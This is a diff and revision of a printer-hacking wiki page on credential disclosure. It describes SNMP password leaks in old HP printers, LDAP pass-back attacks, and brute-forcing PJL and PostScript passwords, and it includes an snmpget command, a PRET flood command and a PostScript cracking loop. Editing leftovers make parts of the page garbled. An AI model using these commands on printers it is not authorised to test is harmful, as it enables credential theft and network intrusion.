Difference between revisions of "Credential disclosure"

From Hacking Printers
Jump to: navigation, search
Line 1: Line 1:
<!--
 
 
 
== Password Disclosure ==
 
== Password Disclosure ==
  
 +
=== SNMP ===
  
Ancient (before 2003) HP printers
+
Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers.
  
ards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A),
+
'''How to test this attack?'''
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
+
and older.
+
  
-The Jetdirect card is being managed from HP Web Jetadmin.
+
To test this attack, the ''snmpset'' tool can be used as shown below:
  
-A Web Jetadmin "device password" had been set on the JetDirect card.
+
<syntaxhighlight lang=sh>
(This password must be set from Web Jetadmin and has nothing to do with
+
$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
the Telnet password or the SNMP Set community name)
+
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 …
 +
</syntaxhighlight>
  
In the above situation the Web Jetadmin device password is readable as
+
Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes.
plain ASCII tekst from the JetDirect card using SNMP.
+
  
How to check your printers for this vulnerability:
+
'''Who can perform this attack?'''
  
Use an SNMP toolkit to read the following OID from your printer:
+
Anyone who can send network packets to port 161/udp of the printer device.  
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.ne
+
t-
+
printer.generalDeviceStatus.gdPasswords
+
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
+
  
An example on a Windows machine, using SNMPUTIL from the Windows Resource
+
=== Pass-Back Attacks ===
kit:
+
C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
+
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
+
Value = String
+
<0x41><0x42><0x43><0x44><0x55><0x56><0x3d><0x31><0x30><0x38><0
+
x3b><0x00><0x00><0x00><0x00> ..etc...
+
  
The resulting string reads in ASCII: ABCDEF=108;
+
Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.
The Web Jetadmin device password is the word before the '=' sign, in this
+
 
case: ABCDEF
+
'''How to test this attack?'''
 +
 
 +
Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating.
 +
 
 +
If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below:
 +
 
 +
<syntaxhighlight lang=sh>
 +
$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
 +
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 …
 +
</syntaxhighlight>
 +
 
 +
Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes.
 +
 
 +
'''Who can perform this attack?'''
 +
 
 +
Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection.
  
How to protect your printer:
 
  
1. Keep the Web Jetadmin device password EMPTY (don't do this on
 
newer cards than the ones mentioned above)
 
2. Define a 'Set community name' instead
 
  
Additional means of protection (does not address t
 
  
  
  
 +
<!--
 
% \textbf{SNMP}
 
% \textbf{SNMP}
 
% \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}]
 
% \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}]
Line 62: Line 60:
 
% in the early days, saved password often within html source code
 
% in the early days, saved password often within html source code
 
% also: GSOAP and other web services
 
% also: GSOAP and other web services
 +
-->
  
  
  
  
 
 
 
 
 
 
 
 
Lexmark SOAP
 
  
 
\subsection{Credential disclosure}\label{par:eval-credential-disclosure}
 
\subsection{Credential disclosure}\label{par:eval-credential-disclosure}
% obtaining web server passwords through NVRAM dumping or file system access as
+
% obtaining web server passwords through NVRAM dumping or file system access as
  
 
% It is worth emphasizing that the cracking is speed nearly independed of the network latency because
 
% It is worth emphasizing that the cracking is speed nearly independed of the network latency because
Line 86: Line 76:
  
  
Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the \textit{Praeda}\footnote{Heiland, D., \textit{Praeda -- Automated Printer Data Harvesting Tool},\\ \url{http://h.foofus.net/?page_id=218}, Aug. 2016} tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' \cite{heiland2011passback}. This works in setups where an MFP verifies users by requesting and external \acs{LDAP} server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone \mbox{(e.g., the attacker itself)} tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs -- which may  offer insufficient protection -- are therefore a good starting point in network penetration tests.\\
 
  
% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.
 
  
  
Line 101: Line 89:
  
  
 +
% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.
  
  
 +
== Brute-Force Attacks ==
  
 +
Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.
  
 +
=== PJL ===
  
 
+
PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
== Brute-Force Attacks ==
+
 
+
Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.
+
  
 
An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.
 
An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.
Line 126: Line 105:
  
 
\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]
 
\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]
@PJL JOB PASSWORD=0
+
@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
+
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
+
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON
+
@PJL DEFAULT CPLOCK=ON
 
\end{lstlisting}
 
\end{lstlisting}
  
Line 154: Line 133:
 
Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.
 
Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.
  
 +
=== PostScript ===
  
PostScript has similar protection mechanisms: The \textit{SystemParamsPassword} is used to change print job settings like paper size while the \textit{StartJobPassword} is required to exit the server loop and therefore permanently alter the PostScript environment. The \texttt{checkpassword} operator which takes either an integer or a string as input checks for both passwords at once \cite{adobe1995supplement}. The key size is very large: PostScript strings can contain arbitrary \acs{ASCII} characters and have a maximal length of 65565 \cite{postscript1999language} which theoretically allows 524,280 bit passwords. On the positive side, \mbox{brute-force} attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:
+
PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:
 
+
  /min 0 def /max 1000000 def
+
  statusdict begin {
+
    min 1 max
+
    {dup checkpassword {== flush stop} {pop} ifelse} for
+
  } stopped pop
+
  \end{lstlisting}
+
  
 +
<syntaxhighlight lang=postscript>
 +
/min 0 def /max 1000000 def
 +
statusdict begin {
 +
  min 1 max
 +
  {dup checkpassword {== flush stop} {pop} ifelse} for
 +
} stopped pop
 +
\end{lstlisting}
 +
</syntaxhighlight>
  
Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's \acs{RIP} is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.
+
Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.
  
 
% on Konica, we can simply DINQUIRE the PASSWORD:
 
% on Konica, we can simply DINQUIRE the PASSWORD:
% 110.143.198.48:/> lock 1
+
% :/> lock 1
 
% PIN protection:  6500
 
% PIN protection:  6500
 
% also not tehat for the dells, the dingquire command showed the password
 
% also not tehat for the dells, the dingquire command showed the password

Revision as of 13:03, 21 January 2017

Password Disclosure

SNMP

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords) was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers.

How to test this attack?

To test this attack, the snmpset tool can be used as shown below:

$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00

Vulnerable devices will return the password in hex-decimal (here: AAAAA), while newer devices do only respond with zerobytes.

Who can perform this attack?

Anyone who can send network packets to port 161/udp of the printer device.

Pass-Back Attacks

Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' [1]. This works in setups where an MFP verifies users by requesting and external LDAP server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.

How to test this attack?

Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating.

If supported Set the LDAP server in the To test this attack, the snmpset tool can be used as shown below:

$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00

Vulnerable devices will return the password in hex-decimal (here: AAAAA), while newer devices do only respond with zerobytes.

Who can perform this attack?

Anyone who can access the printer's embedded web server. This may include [CRSF] attacker, if the web application has no CSRF protection.






\subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as

% It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response).

% even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed.








% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.


Brute-Force Attacks

Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.

PJL

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space [2]. Brute-force attacks as proposed by [3] thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type string which means up to 65,535 characters [4]. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.

An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.

In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}.

\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

\end{lstlisting}


How to test this attack?

./pret.py -q printer pjl
Connection to printer established

 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> flood

Who can perform this attack?

Any anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.



Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable.


Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.

PostScript

PostScript has similar protection mechanisms: The SystemParamsPassword is used to change print job settings like paper size while the StartJobPassword is required to exit the server loop and therefore permanently alter the PostScript environment. The checkpassword operator which takes either an integer or a string as input checks for both passwords at once [5]. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 [6] which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:

/min 0 def /max 1000000 def
statusdict begin {
  min 1 max
  {dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
\end{lstlisting}

Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.

% on Konica, we can simply DINQUIRE the PASSWORD: % :/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password

% newer devices use 2,14mio possibilities (deskjet?)

\begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|}

 \hline
 Printer model             & \multicolumn{2}{c|}{PJL passwords}   & \multicolumn{2}{c|}{PostScript passwords}\\
 \cline{2-5}
                           &  key size &  tests/sec &      key size &  tests/sec\\
 \hline
 \hline                                            %  $2^{19}$
 HP LaserJet 1200          &   16 bit &        200 &  524,280 bit &    5,000 \\ % 192.168.50.48            | PS: 170
 HP LaserJet 4200N         &   16 bit &        200 &  524,280 bit &   91,000 \\ % 192.168.50.30    ON  ON  | PS: 11
 HP LaserJet 4250N         &   16 bit &        130 &  524,280 bit &  100,000 \\ % 192.168.50.110   ON  ON  | PS: 10
 HP LaserJet P2015dn       &   16 bit &      1,000 &  524,280 bit &   83,000 \\ % 192.168.50.45            | PS: 12
 HP LaserJet M2727nfs      &   16 bit &        100 &  524,280 bit &  100,000 \\ % 192.168.50.38            | PS: 10
 HP LaserJet 3392 AiO      &   16 bit &      1,000 &  524,280 bit &   53,000 \\ % 192.168.50.36            | PS: 19
 HP Color LJ CP1515n       &   16 bit &      1,000 &  524,280 bit &  100,000 \\ % 192.168.50.42            | PS: 10
 Brother MFC-9120CN        &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.37    ON UN   | PS: BROTHER | n/a*
 Brother DCP-9045CDN       &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.34            | PS: BROTHER | n/a*
 Lexmark X264dn            &      n/a &        n/a &  524,280 bit &    5,000 \\ % 192.168.50.39            | PS: 170
 Lexmark E360dn            &      n/a &        n/a &  524,280 bit &    8,000 \\ % 192.168.50.43            | PS: 120
 Lexmark C736dn            &      n/a &        n/a &  524,280 bit &   53,000 \\ % 192.168.50.202           | PS: 19
 Dell 5130cdn              &      n/a &        n/a &  524,280 bit &   62,000 \\ % 192.168.50.24            | PS: 16      | n/a**
 Dell 1720n                &      n/a &        n/a &  524,280 bit &   12,000 \\ % 192.168.50.44            | PS: 80
 Dell 3110cn               &      n/a &        n/a &  524,280 bit &   50,000 \\ % 192.168.50.33            | PS: HMMM    | n/a**
 Kyocera FS-C5200DN        &   16 bit &         50 &          n/a &      n/a \\ % 192.168.50.35  OFF  OFF  | PS: --
 Samsung CLX-3305W         &      n/a &        n/a &  524,280 bit &   62,000 \\ % 192.168.50.87            | PS: HMMM
 Samsung MultiPress 6345N  &      n/a &        n/a &          n/a &      n/a \\ % 192.168.50.92            | PS: HMMM
 Konica bizhub 20p         &   16 bit &        n/a &        8 bit &        1 \\ % 192.168.50.123   ON  UN  | PS: BROTHER | n/a*
 OKI MC342dn               &      n/a &        n/a &  524,280 bit &   38,000 \\ % 192.168.50.127

% \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit &  ? \\

 \hline

\end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table}

-->
  1. Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers, D. Heiland and M. Belton, 2011
  2. Printer Job Language Technical Reference Manual, HP Inc., 1997, ch. 6-21
  3. Attacking Networked Embedded Devices, Black Hat USA, FX and FtR of Phenoelit, 2002
  4. PostScript Language Reference Manual, 3rd Edition, Adobe Systems Inc., 1999, p. 739
  5. PostScript Language Reference Manual Supplement for Version 2016, Adobe Systems Inc., 1995, p. 194
  6. PostScript Language Reference Manual, 3rd Edition, Adobe Systems Inc., 1999, p. 739